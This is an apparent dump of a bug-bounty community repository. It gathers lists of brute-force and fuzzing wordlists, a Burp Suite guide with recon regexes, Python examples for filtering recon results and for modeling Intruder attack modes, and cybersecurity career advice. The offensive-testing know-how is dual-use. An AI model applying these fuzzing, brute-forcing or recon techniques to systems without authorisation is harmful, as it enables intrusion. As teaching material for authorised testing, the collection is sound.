**0** Awesome-wordlists - gmelodie - | [Another curated list wordlists for bruteforcing and fuzzing](https://github.com/gmelodie/awesome-wordlists) 





================================================
FILE: Bugbounty/Wordlists/Readme.md
================================================
TODO:
1. Create a wordlist based on backend technology and add a Readme.md to summarize that technology.
2. Create a common wordlist of default pages for different technologies.
Eg: cgi-sys/defaultwebpage.cgi


================================================
FILE: Bugbounty/Wordlists.md
================================================
# Bruteforce Wordlists
Index | wordlists
-- | --
▫️ | [SecLists](https://github.com/danielmiessler/SecLists)
▫️ | [Fuzzdb](http://github.com/fuzzdb-project/fuzzdb)
▫️ | [betterdefaultpasslist](https://github.com/govolution/betterdefaultpasslist)
▫️ | [statistically-likely-usernames](https://github.com/insidetrust/statistically-likely-usernames)
▫️ | [pydictor](https://github.com/LandGrey/pydictor)
▫️ | [mentalist](https://github.com/sc0tfree/mentalist)
▫️ | [wordsmith](https://github.com/skahwah/wordsmith)
▫️ | [IntruderPayloads](https://github.com/1N3/IntruderPayloads)
▫️ | [fuzz.txt](https://github.com/Bo0oM/fuzz.txt)
▫️ | [Password-Scripts](https://github.com/laconicwolf/Password-Scripts)
▫️ | [Pwdb-Public](https://github.com/FlameOfIgnis/Pwdb-Public)
▫️ | [Bug-Bounty-Wordlists](https://github.com/Karanxa/Bug-Bounty-Wordlists)
▫️ | [WordList](https://github.com/orwagodfather/WordList)
▫️ | [Assetnote](https://wordlists.assetnote.io/)
▫️ | [Webapp-wordlists](https://github.com/p0dalirius/webapp-wordlists)
▫️ | [OneListForAll](https://github.com/six2dez/OneListForAll)
▫️ | [generating-personalized-wordlists](https://utkusen.com/blog/generating-personalized-wordlists)
▫️ | [gotator](https://github.com/Josue87/gotator)
▫️ | [CWFF](https://github.com/D4Vinci/CWFF)
▫️ | [passwords/keyboard](https://github.com/sorokinpf/cth_wordlists/tree/master/passwords/keyboard)
▫️ | [random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
▫️ | [passphrase-wordlist](https://github.com/initstring/passphrase-wordlist)
▫️ | [Probable-Wordlists](https://github.com/berzerk0/Probable-Wordlists)
▫️ | [awesome-wordlists](https://github.com/gmelodie/awesome-wordlists)
▫️ | [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings)


Index | wordlists
-- | --
**0** Creating Wordlists for Hacking, Pentesting & Bug Bounty Hunting | [Using Seclists, Bigquery, and More!](https://www.youtube.com/watch?v=QGbTaxtEQlg)
**1** | [login-panel-wordlist](https://github.com/basubanakar/login-panel-wordlist)
**2** Brutas-Wordlists and passwords handcrafted with ♥️| [A pretty comprehensive set of password dictionaries and wordlists designed for quick wins in red teaming scenarios or general blackbox pentesting.](https://github.com/tasooshi/brutas)
**3**  COOK | [An overpower wordlist generator, splitter, merger, finder, saver, create words permutation and combinations, apply different encoding/decoding and everything you need.](https://github.com/giteshnxtlvl/cook)
**4** Scavenger | [Burp extension to create target specific and tailored wordlist from #burp history.](https://github.com/0xDexter0us/Scavenger)
**5** Passphrase-wordlist | [People think they are getting smarter by using passphrases. Let's prove them wrong! This project includes a massive wordlist of phrases (over 20 million) and two hashcat rule files for GPU-based cracking. The rules will create over 1,000 permutations of each phrase](https://github.com/initstring/passphrase-wordlist)
**6**  Webapp Wordlists | [This repository contains wordlists for each versions of common web applications and content management systems (CMS). Each version contains a wordlist of all the files directories for this version.](https://github.com/p0dalirius/webapp-wordlists)
**7** OneListForAll | [This is a project to generate huge wordlists for web fuzzing, if you just want to fuzz with a good wordlist use the file onelistforallmicro.txt.](https://github.com/six2dez/OneListForAll)
**8** skweez | [skweez (pronounced like "squeeze") spiders web pages and extracts words for #wordlist generation.](https://github.com/edermi/skweez)


================================================
FILE: Bugbounty/bugbounty-FAQ.md
================================================
# BUG BOUNTY FAQ - frequently asked questions (Beginner friendly - Under Development)
Note: Contents inside the **RESETHACKER Community** are to help our community members and content belongs to respective Authors and RESETHACKER Team.

BugBounty FAQ   | Title
-- | --
**0** Getting Started in Cybersecurity Advice | [Be-a-hacker and breaking cybersecurity successfully](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Getting_Started_with_Cybersecurity.md)
**0** Domain Information - ResetHacker | [Acquisition, Get IP, Check ASN, check CIDR range, WHOIS, Reverse Whois, DNS Information etc.](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Bugbounty/BB-FAQ/Domain-Information.md)
**0** Bugbounty FAQ - Imran parray | [General questions asked by people](https://github.com/imran-parray/General-Notes)
**0** Bugbounty Setup HelpDesk | [Got stuck During Setup We have solution for you](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/setup)
**0** Job/Internship/Resume HelpDesk | [find Cybersecurity Jobs/interview, advice to get jobs, crack interview etc](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Readme.md)
**0** Stay up to date with conferences | [Track all the upcoming conferences](https://github.com/RESETHACKER-COMMUNITY/Resources/tree/main/Conference)
**0** Trace latest reward, CVE, writeups, tools, Reports, Disclosures and on going trend in Community | [Weekly Newsletter to keep up with infosec community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/tree/main/ResetCybersecuirty)
**0** Build with community | [Create, Build and Automate for personal use ](https://github.com/RESETHACKER-COMMUNITY/Resources/blob/main/Writeups/Create.md)


================================================
FILE: Bugbounty/burpsuite.md
================================================


# Burp Suite for Pentester

Index | title
-- | --
**0** | [Burpsuite - Getting Started, configure, recon setup and understanding popular features](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)
**1** | [ProTips for Burpsuite - More updates coming Soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/protips.md)
**2** | [Writing your Own Burpsuite Extensions - Updating Soon](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/Burpsuite/Readme.md)

------------------------------------------------------------------------------------------------------------

# Burp Suite cheatsheet to hunt the vulnerabilities
Credit : [Ignitetechnologies](https://github.com/Ignitetechnologies/BurpSuite-For-Pentester) 

This cheatsheet is built for the Bug Bounty Hunters and Penetration Testers in order to help them to hunt the vulnerabilities from P4 to P1 solely and completely with "BurpSuite". It is designed such that the beginners can understand the fundamentals and the professionals can brush up their skills with the advanced options. There are multiple ways to perform all the mentioned tasks, thereby we've performed and compiled this list over with our experience. Please share it with your connections and send your queries and feedback directly to [Hacking Articles](https://twitter.com/hackinarticles).

1. [Burp Suite for Pentester: Web Scanner & Crawler](https://www.hackingarticles.in/burp-suite-for-pentester-web-scanner-crawler/)
2. [Burp Suite for Pentester – Fuzzing with Intruder (Part3)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-3/)
3. [Burp Suite for Pentester – Fuzzing with Intruder (Part2)](https://www.hackingarticles.in/burpsuite-for-pentester-fuzzing-with-intruder-part-2/)
4. [Burp Suite for Pentester – Fuzzing with Intruder (Part1)](https://www.hackingarticles.in/burp-suite-for-pentester-fuzzing-with-intruder-part-1//)
5. [Burp Suite for Pentester – XSS Validator](https://www.hackingarticles.in/burp-suite-for-pentester-xss-validator/)
6. [Burp Suite for Pentester – Configuring Proxy](https://www.hackingarticles.in/burp-suite-for-pentester-configuring-proxy/)
7. [Burp Suite for Pentester: Burp Collaborator](https://www.hackingarticles.in/burp-suite-for-pentester-burp-collaborator/)
8. [Burp Suite For Pentester: HackBar](https://www.hackingarticles.in/burp-suite-for-pentester-hackbar/)
9. [Burp Suite for Pentester: Burp Sequencer](https://www.hackingarticles.in/burp-suite-for-pentester-burp-sequencer/)
10. [Burp Suite for Pentester: Turbo Intruder](https://www.hackingarticles.in/burp-suite-for-pentester-turbo-intruder/)
11. [Engagement Tools Tutorial in Burp suite](https://www.hackingarticles.in/engagement-tools-tutorial-burp-suite/)
12. [Payload Processing Rule in Burp suite (Part2)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-2/)
13. [Payload Processing Rule in Burp suite (Part1)](https://www.hackingarticles.in/payload-processing-rule-burp-suite-part-1/)
14. [Beginners Guide to Burpsuite Payloads (Part2)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-2/)
15. [Beginners Guide to Burpsuite Payloads (Part1)](https://www.hackingarticles.in/beginners-guide-burpsuite-payloads-part-1/)
16. [Burpsuite Encoder & Decoder Tutorial](https://www.hackingarticles.in/burpsuite-encoder-decoder-tutorial/)
17. [Burp Suite for Pentester: Active Scan++](https://www.hackingarticles.in/burp-suite-for-pentester-active-scan/)
18. [Burp Suite for Pentester: Software Vulnerability Scanner](https://www.hackingarticles.in/burp-suite-for-pentester-software-vulnerability-scanner/)
19. [Burp Suite for Pentester: Burp’s Project Management](https://www.hackingarticles.in/burp-suite-for-pentester-burps-project-management/)
20. [Burp Suite for Pentester: Repeater](https://www.hackingarticles.in/burp-suite-for-pentester-repeater/)


================================================
FILE: Burpsuite/Assets/Readme.md
================================================



================================================
FILE: Burpsuite/Readme.md
================================================
Credit: Vikram -team ResetHacker

**Q: What is Burp and why is it important for penetration testing?**

  Burp Suite is a web application penetration testing tool developed in Java. It is also known as an "interception proxy" tool because it allows you to inspect, modify, and replay web requests. 
  It has a vast number of plugins to aid in the identification and exploitation of bugs, but its real power comes from giving attackers the ability to inspect and manipulate raw HTTP requests.

**Enterprise - Professional - Community**

	Burp Suite - basic features such as proxy, repeater, intruder, decoder, comparer, etc.
	Burp Suite - advanced features such as Extender, scanner, sequencer, collaborator, infiltrator, etc.

### Download and run
* Download [Burp Suite](https://portswigger.net/burp/communitydownload)
* Run in terminal
```
# To run Burp, you will need Java version 11 to 17.
# Check the installed Java version
java -version
# Start Burp with a 4 GB maximum heap
java -jar -Xmx4g /path/to/burp.jar
```

![burpsuite hotkeys](https://user-images.githubusercontent.com/25515871/177658512-18b7310b-98a2-4462-b353-30a4c0b13c42.jpg)


**Burp-Proxy-Setup**
	The proxy tab is probably the most important tab in Burp. This is where you can see all of your traffic that passes by the Burp proxy.
	
		○ To check Proxy is listening in burp :
		Open BurpSuite > Proxy > options > Running (Ticked)
		○ Force your browser to route its traffic through the Burp proxy:
		Browsers setting > Network setting - connection setting - Manual Proxy Configuration
		(IP: 127.0.0.1  and Port : 8080)
		○ Import the Burp certificate in your browser:
		Type https://burp in browser and download the certificate.
		Settings > Import the CA certificate >  tick all the option & save it.
	
**Note that,** 
    
    ○ Normally people turn “intercept” off (to avoid manually forwarding each request) and instead view the traffic in the “HTTP History” tab. Only turn “intercept” on when trying to isolate requests from a specific feature.
    ○ HTTP History is where I spend 80% of my time looking for something that piques my interest. When looking at the traffic I'm mostly paying attention to the method, URL, and MIME type fields. Why? 
	○ Because when I see a POST method being used I think of Stored XSS, Cross-Site Request Forgery, and many more vulnerabilities. When I see a URL with an email, username, or id in it I think IDOR. When I see a JSON MIME type I think back-end API. Most of this knowledge of what to look for comes with experience.
	○ One functionality that I use to find a lot of vulnerabilities, and that makes my life easier, is the search feature. Basically you can search for a word(s) across all of your Burp traffic.
		For example, I may search for the word “url=”. This should show me all requests which have the parameter URL in them; I can then test for Server-Side Request Forgery (SSRF) or open redirect vulnerabilities. I might also search for the header “Access-Control-Allow-Origin” or the “callback=” GET parameter when testing for Same Origin Policy (SOP) bypasses. 

**[Jason Haddix - To LINK target discovery w/ Burp Suite:](https://twitter.com/jhaddix/status/972926512595746816?lang=en)**
	
	1) Turn off passive scanning
	2) Set forms auto to submit
	3) Set scope to advanced control and use string of target name (not a normal FQDN)
	4) Walk+browse, then spider all hosts recursively!
	5) Profit (more targets)!

**Export subdomains from file to Burp Suite**
Export subdomains from file to Burp Suite by [@tvmpt](https://twitter.com/tvmpt)

```
cat <file-name> | parallel -j 200 curl -L -o /dev/null {} -x 127.0.0.1:8080 -k -s
```

# Recon with BurpSuite
**Credit : https://github.com/ghsec/webHunt/**

### Set scope
* Scope --> Use advanced scope control --> Add --> host or IP range == target

![Scope](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-25-10.png)

### Spidering 
* Select all host in sitemap and Spider. 
* Do it again and again if new hosts are noticed.

### Recon for new Subdomains
* Collect new subdomains that were not detected by the spider, from request and response bodies.
```
(http[s]?:\/\/)?((-)?[\w+\.]){1,20}domain\.com
```
Note: click the + button and check "Regex" and "Auto-scroll to match when text changes".

![ReconSubdomain](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2002-40-35.png)

### Extract endpoints from js file
Note: regex taken from LinkFinder by GerbenJavado
```
(?:"|')(((?:[a-zA-Z]{1,10}://|//)[^"'/]{1,}\.[a-zA-Z]{2,}[^"']{0,})|((?:/|\.\./|\./)[^"'><,;| *()(%%$^/\\\[\]][^"'><,;|()]{1,})|([a-zA-Z0-9_\-/]{1,}/[a-zA-Z0-9_\-/]{1,}\.(?:[a-zA-Z]{1,4}|action)(?:[\?|/][^"|']{0,}|))|([a-zA-Z0-9_\-]{1,}\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\?[^"|^']{0,}|)))(?:"|')
```
![Endpoints](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2009-56-26.png)

### Internal | External IP address
```
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
```
![IP](https://github.com/ghsec/webHunt/blob/master/Img/Screenshot%20from%202019-05-10%2010-08-11.png)
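
The subdomain and IP patterns above over-match (look-alike domains, hostnames that continue past the match, out-of-range octets), so hits need filtering before they go into a report. The following Python is an added example, not code from this page or from the credited webHunt project: it applies both regexes to a saved response body, keeps only hosts under the scope domain, and sorts IP candidates into internal, external and invalid. The scope `example.com`, the function names and the sample body are assumptions constructed for illustration.

```python
import ipaddress
import re

# IP pattern exactly as given on the page.
IP_RE = re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b")

# Ranges treated as "internal" here (an assumption of this example):
# RFC 1918 private space, loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]


def find_subdomains(text, scope_domain):
    """Apply the page's subdomain regex, then drop out-of-scope matches."""
    # Page pattern with "domain\.com" replaced by the escaped scope domain.
    pattern = re.compile(
        r"(http[s]?:\/\/)?((-)?[\w+\.]){1,20}" + re.escape(scope_domain))
    suffix = "." + scope_domain.lower()
    hosts = set()
    for m in pattern.finditer(text):
        # The regex is not anchored at the end, so "cdn.example.com.other.test"
        # matches as "cdn.example.com". Reject when the hostname continues.
        tail = text[m.end():m.end() + 2]
        if re.match(r"[\w-]|\.\w", tail):
            continue
        host = re.sub(r"^https?://", "", m.group(0)).lower()
        # "notexample.com" also matches the regex; require a real label
        # boundary before the scope domain.
        if host.endswith(suffix):
            hosts.add(host)
    return sorted(hosts)


def classify_ips(text):
    """Sort regex hits into internal / external / invalid buckets."""
    result = {"internal": [], "external": [], "invalid": []}
    for cand in dict.fromkeys(IP_RE.findall(text)):  # de-duplicate, keep order
        try:
            addr = ipaddress.ip_address(cand)
        except ValueError:
            # e.g. an octet above 255: matched by the regex, not an address
            result["invalid"].append(cand)
            continue
        internal = any(addr in net for net in INTERNAL_NETS)
        result["internal" if internal else "external"].append(cand)
    return result


# Constructed sample response body (not captured from any real site).
SAMPLE_BODY = """<html><!-- build host 10.0.3.17, jquery 3.6.0 -->
<script src="https://static.example.com/app.js"></script>
<a href="http://api-v2.example.com/v1/users">api</a>
<a href="https://notexample.com/">partner</a>
<a href="https://cdn.example.com.other.test/x">mirror</a>
X-Backend: 192.168.10.5:8080  upstream 203.0.113.10  ver 999.10.1.2
</html>"""

if __name__ == "__main__":
    print("in-scope hosts:", find_subdomains(SAMPLE_BODY, "example.com"))
    for bucket, addrs in classify_ips(SAMPLE_BODY).items():
        print(f"{bucket}: {addrs}")
```

An internal address in a public response is an information-disclosure finding on its own; four-part version strings can also parse as valid addresses, so external hits still need a look at their surrounding context.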


-------------------------------------------------------------------------------------------------------------------------------
Credit: Vikram -team ResetHacker

**2.Target -> SITEMAP** 

    ○ Sitemap becomes fairly useful when hitting an undocumented API endpoint as this view allows you to build a picture of the possible endpoints. You can also view the HTTP requests in this tab, clicking on a folder in the sitemap will only show requests from that path. 

	
**3.Intruder:**
		
    ○ If you're doing any fuzzing or brute forcing with Burp you're probably doing it in the “intruder” tab. When you find an interesting request right click it then click “Send to Intruder”
		
		  Goto "Intruder" > Click "Clear"> Now from here your steps vary depending on what you're trying to do,
		  Eg: we are trying to do some parameter fuzzing. One of the first things we need to do is select the value we are trying to modify. This can be done by highlighting the value and pressing the “Add” button. Since we are attempting to do parameter fuzzing this is the value that will be replaced with our fuzzing payloads. 
		
		You may have also noticed the “Attack type” drop-down menu is set to “Sniper”. There are four different attack types, described in the list below: 
			i. Sniper: uses a single payload list; replaces one position at a time. 
			ii. Battering ram: uses a single payload list; replaces all positions at the same time. 
			iii. Pitchfork: each position has a corresponding payload list, so if there are two positions to be modified they each get their own payload list. 
			iv. Cluster bomb: uses each payload list and tries different combinations for each position.
		Once you have selected your attack type and the value to be modified, click on the “Payloads” sub-tab. Here we want to select our payload type and the payload list. 
		As for the payload list, we want a list of fuzzing values. For this example I'm just going to use the default lists that come with Burp, but there are some other good lists on SecLists: 
		● https://github.com/danielmiessler/SecLists/tree/master/Fuzzing
		To use Burp's predefined lists, just click the “Add from list” drop-down menu and select one.
		Now that you have your fuzzing list imported, all that you have to do is press “Start attack”.
		The next step is to inspect the HTTP responses to determine if there is anything suspicious. However, most professionals don't use intruder, they use a plugin called “Turbo Intruder”
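
The four attack types differ only in how payloads are assigned to the marked positions, which also determines how many requests an attack sends. The following Python is an added example, not Burp's own code and not part of the original page: it models each mode on a request line with two `§`-marked positions. The template, payload lists and function names are assumptions constructed for illustration, and the order in which combinations are produced is illustrative only.

```python
import itertools
import re

# Intruder marks payload positions with a pair of "§" characters.
MARKER = re.compile(r"§([^§]*)§")


def base_values(template):
    """Original values found between the position markers."""
    return MARKER.findall(template)


def render(template, values):
    """Fill the positions left to right with the given values."""
    it = iter(values)
    return MARKER.sub(lambda m: next(it), template)


def _check_sets(template, payload_sets):
    # Pitchfork and cluster bomb need exactly one payload list per position.
    if len(payload_sets) != len(base_values(template)):
        raise ValueError("one payload list per position is required")


def sniper(template, payloads):
    """One list; one position at a time, the others keep their base value."""
    base = base_values(template)
    for pos in range(len(base)):
        for payload in payloads:
            values = list(base)
            values[pos] = payload
            yield render(template, values)


def battering_ram(template, payloads):
    """One list; the same payload goes into every position at once."""
    count = len(base_values(template))
    for payload in payloads:
        yield render(template, [payload] * count)


def pitchfork(template, payload_sets):
    """One list per position, stepped in parallel; stops at the shortest."""
    _check_sets(template, payload_sets)
    for combo in zip(*payload_sets):
        yield render(template, combo)


def cluster_bomb(template, payload_sets):
    """One list per position; every combination across the lists."""
    _check_sets(template, payload_sets)
    for combo in itertools.product(*payload_sets):
        yield render(template, combo)


# Constructed request line and payload lists (placeholders, not real fuzz data).
TEMPLATE = "GET /search?q=§shoes§&sort=§asc§ HTTP/1.1"
LIST_A = ["a", "b", "c"]
LIST_B = ["1", "2"]

if __name__ == "__main__":
    modes = {
        "sniper": sniper(TEMPLATE, LIST_A),
        "battering ram": battering_ram(TEMPLATE, LIST_A),
        "pitchfork": pitchfork(TEMPLATE, [LIST_A, LIST_B]),
        "cluster bomb": cluster_bomb(TEMPLATE, [LIST_A, LIST_B]),
    }
    for name, requests in modes.items():
        requests = list(requests)
        print(f"{name}: {len(requests)} requests, first: {requests[0]}")
```

Request counts grow as positions × payloads for sniper and as the product of the list sizes for cluster bomb, which is worth estimating against the engagement's agreed rate limits before pressing “Start attack”.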
	
**4.Repeater:**
     
     ○ If you want to modify and replay a request, you do it in the Repeater tab, to test the request for vulnerabilities and security misconfigurations.
	   You might have noticed that at the top there are a bunch of different tabs with numbers on them. By default every request you send to the repeater will be assigned a number. Whenever I find something interesting I change this value so I can easily find it later; that's why one of the tabs is labeled SSRF. It’s a quick, easy way to keep a record of things. 
	

**5.Burp Collaborator:**

      ○ A network service which helps to discover blind vulnerabilities such as SQL injection, XML injection, cross-site scripting, code injection, etc.
     
      
![burpcollabrator](https://user-images.githubusercontent.com/25515871/176586154-99f71311-4a8d-4dcb-90ff-8fd8dff48a46.png)

        

    
**6.Burp Recommended Extensions:**
Burp Extender lets you enhance Burp's functionality by installing extensions created by the community, or even writing your own. 
BurpSuite > Extender > BApp Store 

Burp extensions can customize and extend Burp Suite's behavior in numerous ways. A few recommended tools are:
	
![burpsuite recommanded tools](https://user-images.githubusercontent.com/25515871/176586231-3671f592-f870-4583-a05d-d33d3f4a87d3.png)



================================================
FILE: Burpsuite/protips.md
================================================
# Pro Tips for Burpsuite

[Author b1twis3](http://b1twis3.ca/burpsuite-30-pro-tips/) | #BurpSuiteTips

## Sample : 
**[1/30](https://twitter.com/fasthm00/status/1228118057144537088)**  | 
      
      Instead of using many tools to do multiple level of encoding or string manipulation. 
      You can do all of that and MORE using #Hackvertor extension by @garethheyes in just a couple of clicks! 

**[2/30](https://twitter.com/fasthm00/status/1228544097679527937)**  | 
    
     #SleepyPuppy is one of the blind XSS management frameworks by @netflix that integrates with BurpSuite.
     - Manage Assessments and Payloads (Burp or SP)
     - Integration with Repeater and Intruder
     - Logs and Statistics 
     - Active Scan
     - Multiple Users

**[3/30](pic.twitter.com/G1FYXLV8WC)**  |   

      Applying session handling & macro to a 3rd party tool (Sqlmap) and excluding a cookie value from the altering. 
      Note that I just used the profile endpoint and the /login RESTful api for testing purposes. 

**[4/30](https://t.co/oAtqGgubEu)(pic.twitter.com/xapBjWNwAa)** | 
      
      Deploying Private BurpSuite Collaborator in AWS EC2 Instance (Automated). 
      You could use the AWS console to do it manually as well! Note that this is the basic implementation of the server.

**[5/30](pic.twitter.com/s7LwoPGGk2)** |   
       
      Creating sequences of requests/steps using BurpSuite extension #Stepper.
      Another #Tip: 
      No need to be an expert in #RegEx to use Stepper, just use BurpSuite Sequencer (Select! Then copy the RegEx) 
      BUT it's good to know RegEx ofc! 

**[6/30](pic.twitter.com/3t6ECg0W6U)** | 
       
       A short but valuable tip when it comes to automation!
       Generating scripts such as Python, cURL, PowerShell and other scripting languages to reissue a selected HTTP request. 

**[7/30](https://t.co/qYA50Ffw1H)** |
      
      Now you can match responses based on specific conditions and push the matched strings/body to your slack/custom server.
      – Customize the push notification
      – Timer
      – Match all the callbacks.



================================================
FILE: CONTRIBUTING.md
================================================
# Contribution Guidelines

Please note that this project is released with a [Contributor Code of Conduct](code-of-conduct.md). By participating in this project you agree to abide by its terms.

## Submitting a pull request

If you would like to contribute to a ResetHacker community repository, this is how you do it.

<br>

- Fork this repository
- Clone this repository
- Add or Make the changes
- Wait for your pull request to be reviewed and merged!  


## Updating your Pull Request

Sometimes, a maintainer of a ResetHacker community repository will ask you to edit your Pull Request before it is included. This is normally due to spelling errors or because your PR didn't match the ResetHacker guidelines.


================================================
FILE: Contributors.md
================================================
# Contributors

We are very grateful to the following people who have contributed to this project.



================================================
FILE: CyberSecurityJobs/Careers
================================================
1. | [cyber-security-careers/](https://www.sans.org/cybersecurity-careers/20-coolest-cyber-security-careers/)

# Security Operations (SOC L1 & L2 Team)

SUMMARY:  
What happens if antivirus gets triggered, a firewall configuration gets triggered, or some malware is sending data to an outside server (Dashboard):

  1. Monitor and analyse for malicious activity (by opening Event Viewer on a Windows machine.
      Security analysts receive log data from each machine, or search for specific logs/failures, analyse it and create a report; that's why we call ourselves Security Analysts or the L1 team)

  2. Project review
  3. Use tools: Splunk (S.I.E.M)
  4. Incident Response
  5. General CVE & latest vulnerability updates
  
## Roles and responsibilities of an entry-level SOC Analyst
	  • Perform threat analysis
	  • Monitor network for malicious activity
	  • Perform risk analysis, security assessments, and vulnerability testing
	  • Maintain log analysis
	  • Application/ mobile security
	  • Vulnerability scanning in software and hardware
	  • Coordinate with other analysts and departments for network security
	  • Investigate, document, and report all security issues
	  • Implement and maintain security protocols
	  • Involved in security audits – internal and external
	  • Anticipate threats and alerts to avoid their occurrence
	  • Coordinate with vendors on security plans
	  • Analyse breaches to determine their root cause

  From <https://blog.eccouncil.org/become-a-soc-analyst-job-role-expectation-and-salary/?_ga=2.146323316.1731529884.1632004544-1782675224.1632004544> 
Pre-requisite to get into SOC Level 1 –


## COURSE: Security Operations Center | Certified SOC Analyst | CSA | EC-Council (eccouncil.org) 

    1. Security Operations and Management
    2. Understanding Cyber Threats, IoCs, and Attack Methodology 
    3. Incidents, Events, and Logging
    4. Incident Detection with Security Information and Event Management (SIEM)
    5. Enhanced Incident Detection with Threat Intelligence
    6. Incident Response
    


Interview Questions:
    What is a SOC and what is a security analyst?
    Data leaks & high-level steps in data loss prevention
    Phishing, vishing & prevention
    Explain how DNS works
    Some examples of web server vulnerabilities & how to prevent them
    How to protect against SQL injection
    Popular port numbers & why to remove certain ports {80, 22, 443, 58 etc., and understanding of each port}
    Hashing & encryption
    Some security vulnerabilities in 2021 & 2020
    Explain HTTPS & SSL


================================================
FILE: CyberSecurityJobs/CoverLetter.md
================================================
# Cover letter tips for Cybersecurity Jobs :
 
 1. Highlight your experience
 2. Show your passion for the job and talk about projects (if any).
 3. Lean and modify Your resume based on job description.
 4. Recheck and know your cover letter and resume.


*___________________(eg Penetration Tester, security analyst etc) Cover Letter Example 1*

    I am excited to be applying for the ___________________ position at Topdown Security. I have more than five years of experience in the information security field and have been working as a ___________________ for the past two years. I am confident that I have the skills and experience that you are looking for in this role.

    I am motivated by the challenge of finding and exploiting vulnerabilities in systems and enjoy the satisfaction of helping an organization improve their security posture. I have a strong technical background and am proficient in a variety of security assessment tools and techniques. I am also experienced in working with clients and have a proven track record of delivering quality results on time and within budget.

    I am committed to continuing to grow as a ___________________ and am excited about the opportunity to join Topdown Security and learn from the best in the industry. I believe that my skills and experience would be a valuable addition to your team, and I look forward to discussing this opportunity further with you.


*___________________(eg Penetration Tester, security analyst etc) Cover Letter Example 2*

    I am writing in regards to the ___________________ opening that I saw on your website. I am confident that I have the skills and qualifications that you are looking for.

    For the past three years, I have been working as a ___________________. In that time, I have performed hundreds of tests, successfully identifying vulnerabilities in systems. I have also been responsible for developing and implementing security measures to protect systems from future attacks.

    My skills go beyond just identifying vulnerabilities. I am also an expert in penetration testing tools and techniques. I am able to quickly and efficiently find and exploit security holes in systems.

    I am confident that I can be a valuable asset to your company. I am a hard worker who is always willing to go the extra mile. I am also a team player who is able to work well with others.

    Please contact me to discuss any questions you may have. I look forward to hearing from you.

    Sincerely,

    Your name

*___________________(eg Penetration Tester, security analyst, Network Administrator etc) Cover Letter Example 3*

    I am writing to express my interest in the ___________________ position that you have posted. I believe that I would be a great fit for this position as I have extensive experience in the field of ___________________ and security assessment.

    I have been working in the IT industry for over 10 years, with most of my experience being in the field of information security. I have worked on many projects ranging from small business security assessments to enterprise-level network security assessments. I have also worked on several ___________________ engagements, including vulnerability assessments, source code reviews, and wireless assessments.

    My background includes working as a ___________________(eg Penetration Tester, Security Analyst, and Network Administrator). My core competencies include performing vulnerability assessments, penetration testing, and security assessments. I am also skilled in the use of various security tools such as Nessus, Metasploit, Wireshark, and Netcat.

    I am confident that my skills and experience will make me an asset to your organization. I look forward to hearing from you soon.



Source : https://climbtheladder.com/penetration-tester-cover-letter/


================================================
FILE: CyberSecurityJobs/CybersecuityDiscipline.md
================================================

I hope that reading this helps you understand which disciplines best fit your abilities, experience, and interests in a cybersecurity career.

Reference from Cybersecurity Career Guide - By Alyssa Miller 

![Cybersecurity Discipline and jobs](https://user-images.githubusercontent.com/25515871/180645636-0114e9ef-b3af-4fc6-88ff-ed4ccdcba52a.png)
Note: Each of these disciplines, depicted in figure 2.1, categorizes numerous job roles that are constantly evolving and changing. 

          Security operations (SOC TEAM)
          Digital forensics and incident response (DFIR)
          Security architecture and design
          Security assessment and verification (vulnerability assessments, pentesting, red teaming, etc.)
          Application, software, and product security
          Governance and compliance
          Education and awareness
          Sales and sales support
          Leaders and executives
          

**Security operations**(people on the cybersecurity front lines):

  The skill sets of these people tend to be wide ranging as they’re ultimately responsible for maintaining security
  posture across all technologies within an organization. The responsibilities within security operations therefore are
  wide reaching. At the core of security operations is typically the security operations center (SOC). 
  The function of the security operations center (SOC) is to monitor, prevent, detect, investigate, and respond to 
  cyber threats around the clock. SOC teams are also charged with monitoring and protecting the organization's assets including
  intellectual property, personnel data, business systems,and brand integrity.

  The security operations role also interfaces with many of the other roles that we will discuss. For instance, 
  when an alerted event turns out to be an attack, they may need to engage the incident response team to provide 
  a more sophisticated response to the problem (more on that soon). They also need to be aware of the current threat landscape,
  so receiving regular information from threat intelligence resources is crucial.

Advice:
      
      For many who are looking to begin a career in cybersecurity, security operations is where they start. Security operations
      roles often work with automated systems and repeatable tasks that lend themselves well to on-the-job learning and training. 
      Additionally, individuals in these roles can easily leverage previous IT experience in their daily job functions.

      Finally, because of the nature of the role and the wide-ranging responsibilities over various forms of technology,
      security operations is a terrific way to gain exposure to a lot of the technologies and concepts that the cybersecurity
      teams are charged with defending.
      
      
**Digital forensics and incident response (DFIR)** focuses on the identification, investigation, and remediation of cyberattacks.
DFIR has two main components:

    Digital Forensics: A subset of forensic science that examines system data, user activity, and other pieces of digital evidence
                        to determine if an attack is in progress and who may be behind the activity.
    Incident Response: The overarching process that an organization will follow in order to prepare for, detect, contain, and recover from a data breach.
    
Whereas the SOC is responsible for evaluating potential incoming attacks and taking initial steps to defend against
them, they will typically escalate to incident response (IR) personnel if a more coordinated and specialized level of
response is needed or if the breadth of the attack involves extensive portions of the environment.



================================================
FILE: CyberSecurityJobs/For_Jobs.md
================================================
**For Job** :

- 1. Understand domain & choose your Goal.
- 2. Find your Mentor.
